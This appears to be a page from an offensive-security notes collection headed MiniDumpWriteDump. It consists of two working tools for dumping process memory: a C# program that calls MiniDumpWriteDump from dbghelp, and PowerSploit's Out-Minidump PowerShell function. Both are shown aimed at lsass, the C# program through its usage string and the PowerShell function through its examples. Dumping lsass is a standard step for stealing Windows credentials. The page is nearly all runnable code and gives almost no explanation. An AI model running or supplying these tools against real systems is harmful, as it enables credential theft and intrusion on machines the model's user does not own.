MiniDumpWriteDump
c#:
using System;using System.Collections.Generic;using System.Diagnostics;using System.IO;using System.Runtime.InteropServices;using System.Text;using System.Threading;namespace MiniDumpWriteDump{class Program{[DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)]static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle OutFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);static void Main(string[] args){try{Process[] process = Process.GetProcessesByName(args[0]);Console.WriteLine("Get Processes Handle is " + process[0].Handle);Console.WriteLine("Get Processes Id is " + process[0].Id);using (FileStream fs = new FileStream("7kb.tmp", FileMode.Create, FileAccess.ReadWrite, FileShare.Write)){Console.WriteLine("Dump Status:" + MiniDumpWriteDump(process[0].Handle, (uint)process[0].Id, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero));}}catch (Exception){Console.WriteLine("MiniDumpWriteDump.exe lsass");}}}}
ps1:
function Out-Minidump{<#.SYNOPSISGenerates a full-memory minidump of a process.PowerSploit Function: Out-MinidumpAuthor: Matthew Graeber (@mattifestation)License: BSD 3-ClauseRequired Dependencies: NoneOptional Dependencies: None.DESCRIPTIONOut-Minidump writes a process dump file with all process memory to disk.This is similar to running procdump.exe with the '-ma' switch..PARAMETER ProcessSpecifies the process for which a dump will be generated. The process objectis obtained with Get-Process..PARAMETER DumpFilePathSpecifies the path where dump files will be written. By default, dump filesare written to the current working directory. Dump file names take followingform: processname_id.dmp.EXAMPLEOut-Minidump -Process (Get-Process -Id 4293)Description-----------Generate a minidump for process ID 4293..EXAMPLEGet-Process lsass | Out-MinidumpDescription-----------Generate a minidump for the lsass process. Note: To dump lsass, you must berunning from an elevated prompt..EXAMPLEGet-Process | Out-Minidump -DumpFilePath C:\tempDescription-----------Generate a minidump of all running processes and save them to C:\temp..INPUTSSystem.Diagnostics.ProcessYou can pipe a process object to Out-Minidump..OUTPUTSSystem.IO.FileInfo.LINKhttp://www.exploit-monday.com/#>[CmdletBinding()]Param ([Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)][System.Diagnostics.Process]$Process,[Parameter(Position = 1)][ValidateScript({ Test-Path $_ })][String]$DumpFilePath = $PWD)BEGIN{$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')$Flags = [Reflection.BindingFlags] 'NonPublic, Static'$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)$MiniDumpWithFullMemory = [UInt32] 2}PROCESS{$ProcessId = $Process.Id$ProcessName = $Process.Name$ProcessHandle = $Process.Handle$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,$ProcessId,$FileStream.SafeFileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))$FileStream.Close()if (-not $Result){$Exception = New-Object ComponentModel.Win32Exception$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"# Remove any partially written dump files. For example, a partial dump will be written# in the case when 32-bit PowerShell tries to dump a 64-bit process.Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinuethrow $ExceptionMessage}else{Get-ChildItem $ProcessDumpPath}}END {}}
参考链接:
最近更新 4 months ago